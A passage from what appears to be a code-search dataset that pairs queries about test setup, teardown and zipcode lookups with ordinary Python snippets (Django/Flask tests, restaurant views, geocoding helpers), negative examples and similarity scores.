get_user_model().objects.create_user(\n '[email protected]',\n 'zohaib123'\n )\n Ingredients.objects.create(user=user2, name='Vinegar')\n\n ingredient = Ingredients.objects.create(\n user=self.user, name=\"Turmeric\"\n )\n res = self.client.get(INGREDIENT_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], ingredient.name)", "def test_get_restaurant_by_id(self):\n from espresso import db\n from espresso import Restaurant\n\n name = 'Restaurant Greco'\n db.session.add(Restaurant(name=name, creator='[email protected]'))\n db.session.commit()\n\n # Since this is a freshly created table, the first id should be 1\n resp = self.test_client.get(self.API_BASE + '/1', headers=auth_header_cru_restaurants)\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertEqual(resp_dict['restaurant']['name'], name)", "def test_get_is_book_on_shelf(self, *_):\n shelf = self.local_user.shelf_set.first()\n self.assertFalse(shelf_tags.get_is_book_on_shelf(self.book, shelf))\n models.ShelfBook.objects.create(\n shelf=shelf, book=self.book, user=self.local_user\n )\n self.assertTrue(shelf_tags.get_is_book_on_shelf(self.book, shelf))", "def add_user_to_db(json_details):\n return True", "def newMenuItem(restaurant_id):\n\n if 'access_token' not in flask_session:\n return logInRedirect()\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).first()\n user_id = getUserId(flask_session['email'],flask_session['google_plus_id'])\n if not restaurant.user_id == user_id:\n flash(\"Only restaurant owners can add new items.\")\n return redirect(url_for(\"publicMenu\",restaurant_id = restaurant_id))\n\n if request.method == \"POST\":\n new_name = request.form['new_name']\n print \"\\nnewMenuItem POST triggered, name is: \", new_name\n newMenuItem = MenuItem( name=new_name,\n 
restaurant_id=restaurant.id )\n session.add(newMenuItem)\n session.commit()\n flash( \"new item '\" + new_name + \"' created!\")\n print \"POST worked!\"\n return redirect(url_for(\"showMenu\", restaurant_id=restaurant.id))\n\n else:\n return render_template('newMenuItem.html', restaurant = restaurant)", "def test_get_feature_starrers__some_starrers(self):\n app_user_1 = models.AppUser(email='[email protected]')\n app_user_1.put()\n app_user_2 = models.AppUser(email='[email protected]')\n app_user_2.put()\n feature_1_id = self.feature_1.key.integer_id()\n notifier.FeatureStar.set_star(app_user_1.email, feature_1_id)\n notifier.FeatureStar.set_star(app_user_2.email, feature_1_id)\n\n actual = notifier.FeatureStar.get_feature_starrers(feature_1_id)\n self.assertItemsEqual(\n [app_user_1.email, app_user_2.email],\n [au.email for au in actual])", "def test_user_retrieve_restaurant(self):\n response = self.client.get(f'/api/places/1/', format='json')\n self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_update_restaurant_blank_name(self):\n from espresso import db\n from espresso import Restaurant\n\n name = 'Restaurant Mexicano'\n db.session.add(Restaurant(name=name, creator='[email protected]'))\n db.session.commit()\n\n headers = {'Content-Type': 'application/json'}\n headers.update(auth_header_cru_restaurants)\n info = {'name': ''}\n resp = self.test_client.put(self.API_BASE + '/1', headers=headers, data=json.dumps(info))\n self.assertEqual(resp.status_code, 400)", "def post(self, request, slug):\n try:\n article = Article.objects.get(slug=slug)\n except Article.DoesNotExist:\n return Response({\"Message\": [\n \"That article does not exist\"\n ]}, status.HTTP_204_NO_CONTENT)\n favorite = dict()\n favorite[\"user\"] = request.user.id\n favorite[\"article\"] = article.pk\n serializer = self.serializer_class(data=favorite)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n article_serializer = ArticleSerializer(\n instance=article, context={'request': request})\n data = dict(article=article_serializer.data)\n data[\"article\"][\"favorited\"] = True\n data[\"message\"] = \"favorited\"\n return Response(data, status.HTTP_200_OK)" ]
[ "0.72114295", "0.6636154", "0.6632463", "0.65658706", "0.64831656", "0.6482696", "0.6476188", "0.64745235", "0.6445702", "0.6381491", "0.6374218", "0.6319528", "0.6261317", "0.6236881", "0.6179164", "0.6172634", "0.6163744", "0.6161769", "0.6146276", "0.6124457", "0.60840327", "0.6082842", "0.6063424", "0.6043306", "0.6040604", "0.60332847", "0.60214037", "0.6017845", "0.5996445", "0.59783953", "0.59630066", "0.59426045", "0.5907134", "0.5890616", "0.5873086", "0.58557093", "0.5843716", "0.5838309", "0.5833724", "0.58273315", "0.58217096", "0.58204156", "0.57307446", "0.57043576", "0.56848633", "0.5684691", "0.56819737", "0.56725836", "0.5670301", "0.5669386", "0.56667906", "0.56558275", "0.56395274", "0.5638145", "0.56235874", "0.56175506", "0.5587593", "0.55795", "0.55683464", "0.5561002", "0.5560598", "0.55406415", "0.553992", "0.5533672", "0.55330646", "0.55322725", "0.552966", "0.5528444", "0.5528023", "0.55215436", "0.5520078", "0.55152476", "0.5507108", "0.54975736", "0.5497368", "0.5484245", "0.54831713", "0.5466831", "0.5453766", "0.54491746", "0.54470766", "0.5444997", "0.5444987", "0.54427916", "0.54321253", "0.5427761", "0.54244006", "0.54219854", "0.54069823", "0.53986573", "0.53986573", "0.5396267", "0.53886825", "0.5383246", "0.53826976", "0.537803", "0.5376038", "0.537137", "0.5369109", "0.5359738" ]
0.78729564
0
Stuff to do before every test.
def setUp(self): # Get the Flask test client self.client = app.test_client() # Show Flask errors that happen during tests app.config['TESTING'] = True # Connect to test database connect_to_db(app, "postgresql:///testdb") # Create tables and add sample data db.create_all() users() reviews() with self.client as c: with c.session_transaction() as sess: sess['user_id'] = 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_run_tests(cls):\n pass", "def do_before(self):\r\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def setUp(self):\r\n # nothing to do, all tests use different things\r\n pass", "def setUp(self):\n print(\"New test by Nikolay Melnik\")", "def beforeTest(self, test):\n self.setupLoghandler()", "def before(self) -> None:\n pass", "def setUp(self):\r\n pass # nothing used by all\r", "def setUp(self):\n pass #because we dont have anything to setup.", "def setUp(self) -> None:\n pass", "def setUp(self) -> None:\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\r\n pass # nothing required by all\r", "def setUp(self):\n\n pass", "def setUp(self):\n\n pass", "def setUp(self) :\n pass", "def setUp(self):\n\n return", "def setUp(self):\r\n pass", "def setUp(self):\n print('Calling \\'setUp\\'')", "def setUp(self):\n self", "def setUp(self):\n self", "def setUp(self):\n \n pass", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def setUp(self):\n\n BaseTest.setUp(self)", "def startTestHook(self):", "def setUp(self):\n MainTests.setUp(self)", "def setUp(self):\n setUp()", "def setUp(self):\n super(BasicTestCase, self).setUp()", "def setUp(self):\n test_env_setup()", "def setUp_extra(self):\n pass", "def setUp(self):\n print(\"\\nIn setUp()...\")", "def setUp(self):\n\n # ISSUE007\n # TODO, pyunit's bright idea is to call setup before each test. It\n # was defining multiple patterns which was annoying but not a problem.\n # The cleanest way to do things is probably to remove patterns after\n # the test, but we don't have that functionality. 
For now just create\n # one pattern to avoid confusion, but do it by hacking in a global\n # variable\n\n global firstTime\n\n if not firstTime:\n return\n firstTime = False\n\n # get the full source name for even and odd sources\n out_of_order_numbers = quilt_test_core.get_source_name(\n \"out_of_order_numbers\")\n\n # TODO REad the pattern id from the std output then query that one\n # See ISSUE007 and ISSUE008\n # call quilt_define with the pattern code and name query\n # dups_follows\n quilt_test_core.call_quilt_script('quilt_define.py', ['-n',\n 'out_of_order',\n 'source(\"' + out_of_order_numbers + '\",\"grep\")'])", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_RMT_Util:\", self._testMethodName)", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def setUpTestCase(self):\n pass", "def setUp(self):\n raise NotImplementedError", "def setUp(self) -> None:\n return super().setUp()", "def setUp(self):\n\n self._set_up()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n self.setup_beets()", "def setUp(self):\n print 'unittest.setUp()'\n pass", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n if not self.flag:\n self.fail(self.err_msg)", "def setUp(self):\n # use self.attribute to keep anything which needs to be accessed later\n print('setUp method\\n')", "def before_each_test(self, request):\n self.test_counter = Counter()\n self.check_ref = request.config.getvalue(\"check_ref\")\n self.create_ref = request.config.getvalue(\"create_ref\")", "def setUp(self):\n super(TestCase, self).setUp()\n self._context = CallContext()", "def on_before_execution(self):\n pass", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n self.setUpPyfakefs()", "def startTestRun(self):", "def setUp(self):\n assert COMMANDS.keys() == EXPCT_RESULTS.keys()\n self.tests = []\n self.test_numbers = deque(sorted(COMMANDS.keys()))", "def __call__(self, result=None):\n self._pre_setup()\n super(TestCase, self).__call__(result)\n self._post_tearDown()", "def _fixture_setup(self):\n pass", "def test_begin(self):", "def setUp(self):\n self.Reinitialize()", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_ValidParams:\", self._testMethodName)", "def setUp(self):", "def setUp(self):", "def setUp(self):", "def setUp(self):" ]
[ "0.8209909", "0.8028296", "0.80253834", "0.7872079", "0.76552856", "0.76427346", "0.7627397", "0.7540311", "0.7515845", "0.74945575", "0.74945575", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.7428322", "0.7426078", "0.7426078", "0.7420724", "0.7384354", "0.7378374", "0.7370478", "0.73638576", "0.73638576", "0.7355973", "0.73555076", "0.7353191", "0.73489285", "0.7347254", "0.73437107", "0.7263831", "0.72633225", "0.72391665", "0.7169371", "0.71394217", "0.713784", "0.7133868", "0.7133868", "0.7119319", "0.7118144", "0.71014655", "0.70950025", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.6989451", "0.6986", "0.6980955", "0.6980955", "0.69528717", "0.69458896", "0.6935865", "0.68862945", "0.68795764", "0.68782437", "0.68782437", "0.68782437", "0.68782437", "0.68782437", "0.68782437", "0.68605286", "0.6854516", "0.68527067", "0.6852522", "0.6850463", "0.68246025", "0.6805653", "0.68054616", "0.6795788", "0.6795788", "0.6795788", "0.6795788" ]
0.0
-1
Do at end of every test.
def tearDown(self): db.session.close() db.drop_all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_finished(self):\n\n # We'll start the next test in an idle, so that the current one is\n # properly terminated, and we do not execute in its context\n\n GLib.idle_add(self._do_test)", "def test_run_ended(self):", "def finished_tests(self):\n self.testing = 0", "def tearDown(self):\n\t\tprint(\"end test\")\n\t\tpass", "def after_test(self, test_results):\n pass", "def endOfTestcase(self):\n pass # nothing to do here. Hence pass statement is called.", "def on_test_end(self, logs=None):", "def after_all(self) -> None:", "def on_test_end(self):\n for callback in self.callbacks:\n callback.on_test_end(self, self.get_model())", "def after_test(self, func, *args, **kwargs):\n pass", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def tearDown(self):\n pass\n # teardown called after each test\n # e.g. maybe write test results to some text file", "def tearDown(self):\n super(TestCase, self).tearDown()\n self._context.check_done()", "def pytest_finished_handling_group(session, worker):", "def after(self):\n pass", "def after(self):\n pass", "def do_after(self):\r\n pass", "def teardown(self) -> None:", "def teardown(self) -> None:", "def teardown(self) -> None:", "def eof(self):\n self.report_scenario_completed()\n self.report_feature_completed()\n self.report_failures()\n self.stream.flush()\n self.reset()", "def teardown(self):", "def teardown(self):", "def teardown(self):", "def finish():\n pass", "def done(self):\n log.debug(\"Test run concluded\")\n if self._startTime is not None:\n self.report['startTime'] = self._startTime\n self.report['runTime'] = time.time() - self._startTime\n self.report['testsRun'] = self.testsRun\n self.report['tests'] = self._tests\n self.writeReport()", "def tearDown(self):\n self.logger.info(\"tearDown begin\")\n self.logger.info(\"tearDown end\\n\")", "def finish(self):\n pass", "def finish(self):\n pass", "def _end(self):\n\n self.logger.msg1(\"Done\")", "def Finish(self):\n pass", "def done(self):", "def done(self):", "def end(self):\n self._log.debug('%s: doing ..', __class__.__name__)\n self._log.debug('%s: done.', __class__.__name__)", "def finish():", "def finish():", "def finish():", "def finish():", "def teardown_method(self):\n world.clear_paths()\n print(\"\\nEnd of tests in: %s\\n-------------------\\n\" % __name__)\n self.bigml = {}", "def finished_tests(self):\n self.testing = 0\n if not self.closing:\n self.enable_menus(1)\n self.parent.finished_tests()", "def teardown(self):\n pass", "def teardown(self):\n pass", "def teardown(self):\n pass", "def end(self):\n ...", "def tearDown(self):\n print('Calling \\'tearDown\\'')", "def end(self):\n self._log.debug('doing ..')\n super().end()\n\n self._log.debug('done')", "def teardown(self):\n pass # pylint: disable=unnecessary-pass", "def finish(self) -> None:", "def finish(self) -> None:", "def after(self) -> None:\n pass", "def afterWork(self):\n pass", "def teardown(self) -> None:\n pass", "def teardown(self) -> None:\n pass", "def finished(self):\n\t\telog(\"finished\")", "def finish(self):", "def finish(self):", "def teardown(self, rc):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(c: Composition) -> None:\n c.run(\"testdrive\", \"verify-data.td\")", "def _do_test(self):\n\n process_all_events()\n\n if self.list:\n (callback, args, kwargs) = self.list.pop(0)\n 
callback(*args, **kwargs)\n else:\n safe_exit(force=1)", "def teardown(self):\n self.tcex.log.trace('teardown')", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def tearDown(self):\n\t\tpass", "def tearDown(self):\r\n self.app.application_close(self.util.client, self.app_name)\r\n\r\n self.common.generate_report(self.util.client, False)\r\n # Releases the client so that other clients can approach the agent in the near future.\r\n self.common.release_client(self.util.client)\r\n self.logger.info(\"==============Results=================\")\r\n self.logger.info(\"Number of Strings verified: \" + str(len(Config.results_list)/2))\r\n for i in range(0, len(Config.results_list), 2):\r\n self.logger.info(str(Config.results_list[i]) + \"{:>36}\".format('=====> ')\r\n + str(Config.results_list[i+1]))\r\n self.logger.info(\"Testcase tear-down: COMPLETED\")", "def _teardown(self):\n # No-op base implementation", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def clean_up(self) -> None:\n print('Doing some clean-up work...')", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n self.teardown_beets()", "def tearDown(self):\n pass #because we dont have anything to tearDown.", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def end(self) -> None:", "def finish(self):\n if self.failed:\n print \"%s failed. %s of %s assertions passed.\" % (\n self.failed, self.passed, self.failed + self.passed)\n else:\n print \"%s of %s assertions passed.\" % (self.passed, self.passed)\n\n self.failed = self.passed = 0", "def test_teardown(self):\n assert self.search_behaviour.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self):\r\n testing.tearDown()", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def finish(self) -> None:\n self.__exit__(None, None, None)", "def test_teardown(self):\n assert self.http_handler.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self) -> None:\n\n logging.info(f\"{'=' * 20}Test completed!{'=' * 20}\")\n logging.info(\"Failed to execute the following parameter combinations: \")\n if self.error_params:\n for each in self.error_params:\n logging.info(each)", "def complete_run():\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass" ]
[ "0.78425974", "0.77754915", "0.77742684", "0.7766872", "0.76616216", "0.75920033", "0.7470884", "0.73606", "0.73159856", "0.7297722", "0.7293865", "0.7293865", "0.72588974", "0.7235985", "0.72320426", "0.7224789", "0.7224789", "0.72181326", "0.72043455", "0.72043455", "0.72043455", "0.71976244", "0.7169287", "0.7169287", "0.7169287", "0.71564865", "0.7147801", "0.71392965", "0.7076554", "0.7076554", "0.7069717", "0.7041966", "0.7038115", "0.7038115", "0.70337486", "0.70182955", "0.70182955", "0.70182955", "0.70182955", "0.70081335", "0.7004758", "0.6997527", "0.6997527", "0.6997527", "0.69892746", "0.69694585", "0.69613737", "0.6956021", "0.69547766", "0.69547766", "0.6952943", "0.6912461", "0.6906216", "0.6906216", "0.68874747", "0.6876898", "0.6876898", "0.6872803", "0.68528396", "0.68528396", "0.68528396", "0.684885", "0.6844017", "0.6826692", "0.68262887", "0.68262887", "0.68262887", "0.6800694", "0.67869633", "0.67826825", "0.6779946", "0.6779946", "0.6779946", "0.6779946", "0.6779946", "0.677544", "0.677034", "0.677034", "0.677034", "0.677034", "0.6764208", "0.6764208", "0.6764208", "0.67621267", "0.6758972", "0.67563933", "0.6751442", "0.6749756", "0.67355955", "0.67334735", "0.67305505", "0.67238015", "0.672133", "0.6718853", "0.67131215", "0.6708315", "0.66984904", "0.66984904", "0.66984904", "0.66984904", "0.66984904" ]
0.0
-1
Find restaurant name by zipcode.
def test_process_searchbox_with_mock(self): result = self.client.get('/process_searchbox', data={'zipcode': '94043', 'cuisine': 'indian'}) self.assertIn(b"Dosa Paratha", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def county_name(zipcode): \n search = SearchEngine(simple_zipcode=True) # set simple_zipcode=False to use rich info database\n zipcode_query = search.by_zipcode(str(zipcode))\n zipcode_query_dict = zipcode_query.to_dict()\n county = zipcode_query_dict['county']\n if county is None:\n print('Invalid County')\n else :\n if 'County' in county:\n county = county[:-7]\n if county in county_list:\n print('County is County List')\n print(county)\n return county", "def get_zipsearch(zipcode=u''):\n from x84.bbs import getterminal, LineEditor, echo\n term = getterminal()\n echo(u''.join((u'\\r\\n\\r\\n',\n term.bold_yellow(u' -'),\n term.reverse_yellow(u':'),\n u' ')))\n return LineEditor(width=min(30, term.width - 5), content=zipcode).read()", "def find_one(cls, zipcode ):\n qry = cls.session.query(cls).filter(cls.ZIPCODE.ilike(f'{zipcode}'))\n zc = qry.one()\n return zc", "def find_zip_codes(self, zip_code):\n zip_code = str(zip_code).strip()\n cursor = self.households.find({\"addresses.zip_code\":zip_code})\n results = [Household.from_dict(dct) for dct in cursor]\n\n cursor = self.businesses.find({\"address.zip_code\":zip_code})\n results += [Business.from_dict(dct) for dct in cursor]\n\n return results", "def lookup_usaf_station_by_zipcode(zipcode):\n\n usaf = zipcode_usaf.get(zipcode, None)\n return usaf", "def get_zipcode_names(add):\r\n lng=get_address(add)[1]\r\n lat=get_address(add)[0]\r\n engine = get_sql_engine()\r\n query = text(\r\n \"\"\"\r\n SELECT\r\n code\r\n FROM philly_zipcode\r\n WHERE ST_Intersects(geom, ST_SetSRID(ST_MakePoint(:lng, :lat), 4326))\r\n \"\"\"\r\n )\r\n resp = engine.execute(query,lng=lng, lat=lat).fetchall()\r\n # get a list of names\r\n names = [row[\"code\"] for row in resp][0]\r\n return names", "def get_info_on_postalcode(_, postalcode):\n fourpp = int(postalcode[0:4])\n chars = postalcode[4:6]\n streets = get_streets(fourpp, chars)\n if streets:\n street = streets[0]\n town = street.postcode.city.get_official_name()\n address = street.street\n data = {'found': True, 'address': address, 'town': town}\n else:\n data = {'found': False}\n j = json.dumps(data)\n return HttpResponse(j, content_type='application/json')", "def get_city(zip_code):\r\n\r\n # API key, retrieved from configure.py\r\n api_key = configure.ZIP_KEY\r\n\r\n # API endpoint\r\n url = f'https://www.zipcodeapi.com/rest/{api_key}/info.json/{zip_code}/degrees'\r\n\r\n # API call\r\n response = requests.get(url)\r\n\r\n # Collect response in json format\r\n data = response.json()\r\n\r\n if 'error_code' in data or 'error_msg' in data:\r\n return {\r\n 'success': False,\r\n 'query': zip_code\r\n }\r\n\r\n else:\r\n return {\r\n 'success': True,\r\n 'query': data['zip_code'],\r\n 'city': data['city'],\r\n 'state': data['state'],\r\n 'lat': data['lat'],\r\n 'lon': data['lng']\r\n }", "def searchZipcode(zipcode, jurisdictions):\n try:\n if len(str(zipcode)) != 5:\n return jurisdictions.none()\n\n zipcode = Zipcode.objects.get(code=zipcode)\n j = jurisdictions.filter(geometry__intersects=zipcode.geometry)\n return j\n except Exception as e:\n print(e)\n return jurisdictions.none()", "def get(self, zipcode):\n response = hereService.getWeatherByZipcode(zipcode)\n return response", "def get_zipcode_hospitals(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n hospital_info = text(\r\n \"\"\"\r\n SELECT\r\n\t \"HOSPITAL_NAME\" AS name, \"STREET_ADDRESS\" as address,\r\n \"PHONE_NUMBER\" as contact, geom,\r\n ST_X(geom) AS lon, ST_Y(geom) AS lat\r\n FROM philly_hospital\r\n WHERE 
\"ZIP_CODE\" = :name\r\n \"\"\"\r\n )\r\n hospitals = gpd.read_postgis(hospital_info, con=engine, params={\"name\": name})\r\n return hospitals", "def match_city(self, city, dpt_code, zip_code = None):\n city = format_str_city_insee(city)\n dpt_code = dpt_code.rjust(2, '0')\n if zip_code:\n zip_code.rjust(5, '0')\n # Based on zip code and city name\n ls_matching = []\n found_indicator = False\n if zip_code:\n if zip_code in self.dict_corr_zip_insee:\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_zip_insee[zip_code]:\n if city == city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'zip_city_match')\n # If no exact zip, city match: check if city name in insee city names\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_zip_insee[zip_code]:\n if city in city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'zip_city_in_match(es)')\n # Based on dpt code and city name\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_dpt_insee[dpt_code]:\n if city == city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'dpt_city_match')\n # If no exact dpt, city match: check if city name in insee city names\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_dpt_insee[dpt_code]:\n if city in city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'dpt_city_in_match(es)')\n # No match\n return (None, 'no_match')", "def get_city_by_code(post_code):\n post_code = post_code.replace(' ', '').encode('utf-8')\n error = ''\n city = ''\n opener = urllib2.build_opener()\n url = 'http://maps.googleapis.com/maps/api/geocode/json?address={0}&sensor=false'.format(post_code)\n response = opener.open(url).read()\n response_dict = json.loads(response)\n request_status = response_dict['status']\n if request_status == 'OK':\n logger.debug('Google response')\n logger.debug(response_dict)\n results = response_dict['results']\n \"\"\"\n first get all results\n with required zip code\n \"\"\"\n results_with_required_zip_code = []\n for result in results:\n address_components = result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'postal_code' and address_component['short_name'].replace(' ', '').lower() == post_code.lower():\n results_with_required_zip_code.append(result)\n if not results_with_required_zip_code:\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n # error = 'No location with post code %s' % post_code\n else:\n \"\"\"\n next we need all results in GB\n \"\"\"\n results_with_required_zip_code_in_GB = ''\n for good_result in results_with_required_zip_code:\n address_components = good_result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'country' and address_component['short_name'].lower() == 'GB'.lower():\n results_with_required_zip_code_in_GB = good_result\n if not results_with_required_zip_code_in_GB:\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in 
GB' % post_code\n else:\n \"\"\"\n finally find city name\n \"\"\"\n address_components = results_with_required_zip_code_in_GB['address_components']\n # first try get postal city\n searching_city = get_city_by_key(address_components, 'postal_town')\n if not searching_city:\n # next by administrative_area_level_2\n searching_city = get_city_by_key(address_components, 'administrative_area_level_2')\n if not searching_city:\n print url\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n city = searching_city\n elif request_status == 'ZERO_RESULTS':\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n else:\n error = request_status\n return {\n 'error': error,\n 'data': city\n }", "def get_postal_code_by_name(self, name):\n raise NotImplementedError()", "def zillow_query(address, zipcode, key=keys.zillow):\n zillow_data = ZillowWrapper(key)\n deep_search_response = zillow_data.get_deep_search_results(\n address, zipcode)\n result = GetDeepSearchResults(deep_search_response)\n return result", "def compute_zip_code(zip_code_text):\n zip_code = None\n if zip_code_text and len(zip_code_text) >= 5 and zip_code_text.isdigit():\n zip_code = zip_code_text[:5]\n return zip_code", "def main(postalcode):\n places = postalcodes_mexico.places(postalcode)\n click.echo(places)\n return 0", "def patrons_in_zipcode(session, zipcode):\n\n query = {\n 'target': {\n 'record': {\n 'type': 'patron'\n },\n 'id': 80010\n },\n 'expr': {\n 'op': 'equals',\n 'operands': [\n str(zipcode),\n ''\n ]\n }\n }\n\n url = '/patrons/query?offset=0&limit={}'.format(str(api_limit))\n headers = {'content-type': 'application/json'}\n data = json.dumps(query)\n r = session.post(api_url_base + url, data=data, headers=headers)\n entries = json.loads(r.text)['entries']\n record_ids = [x['link'].split('/')[-1] for x in entries]\n return record_ids", "def correct_zipcode(business_tag, zipcode):\n try:\n address = business_tag.find('div', {'class': 'secondary-attributes'}).find('address').text\n zipcode_found = re.search(re.compile('(^|[^\\d])\\d{5}($|[^\\d])'), address).group(0)\n zipcode_found = re.search(re.compile('\\d{5}'), zipcode_found).group(0)\n return zipcode_found == zipcode\n except:\n return False", "def find_places(query):\n parts = str(query).split(' ')\n for i, p in enumerate(parts):\n p = p.replace('-', ' ').strip()\n try:\n postal_code = int(p)\n if len(postal_code) == 4:\n print(postal_code, parts[i+1])\n # Check \n #response = get_osm_location(\"{postal_code} {name}\")\n #lon = response['lon']\n #lat = response['lat']\n #poly = \n except Exception as e:\n continue", "def type_zip_code(self, zip_code):\n\n\t\twith allure.step(\"Type payee zip code\"):\n\t\t\telement = Element(driver=self.driver,\n\t\t\t explicit_wait_time=self.explicit_wait_time,\n\t\t\t locator=BillPayPageLocator.ZIP_CODE_INPUT)\n\t\t\telement.write(zip_code)\n\t\t\treturn None", "def search_using_magento_code(cls, code):\n countries = cls.search([('code', '=', code)])\n\n if not countries:\n return cls.raise_user_error(\n \"country_not_found\", error_args=(code, )\n )\n\n return countries[0]", "def postal_code():\r\n\r\n cursor.execute('SELECT col_1 FROM zipcodes order by RANDOM() limit 1;'\r\n )\r\n return cursor.fetchone()[0]", "def extract_zipcode(full_address):\n full_address = full_address.strip()\n last_space_index = full_address.rindex(\" 
\")\n zipcode = full_address[last_space_index + 1 : ]\n return zipcode", "def get_postal_zone(self, postal_code: str) -> PostalZone:\n key = postal_code.lower()\n try:\n return self._postal_zones[key]\n except KeyError:\n postal_code = PostalZone(postal_code=postal_code, city=self)\n self._postal_zones[key] = postal_code\n return postal_code", "def get_testing_locations_by_zip():\n\n zip_code = request.args.get('zip_code')\n\n testing_info = get_testing_location_by_zipcode(zip_code)\n data = format_data(d=testing_info, key='test_id')\n\n return jsonify(data)", "def search_address(query: str) -> Tuple[int, str]:\n\n url = 'https://api.n1.ru/api/v1/geo/geocoder/with_cities/'\n params = _search_params.copy()\n params['q'] = query\n\n try:\n r = requests.get(url, params=params, headers=_headers)\n response = r.json()\n\n if not 'result' in response or not response['result']:\n raise NotFoundException('Result not found or empty.')\n \n address = None\n house_number = query.split(',')[-1].strip()\n for x in response['result']:\n if x['name_ru'].lower() == house_number:\n address = x\n break\n \n if address is 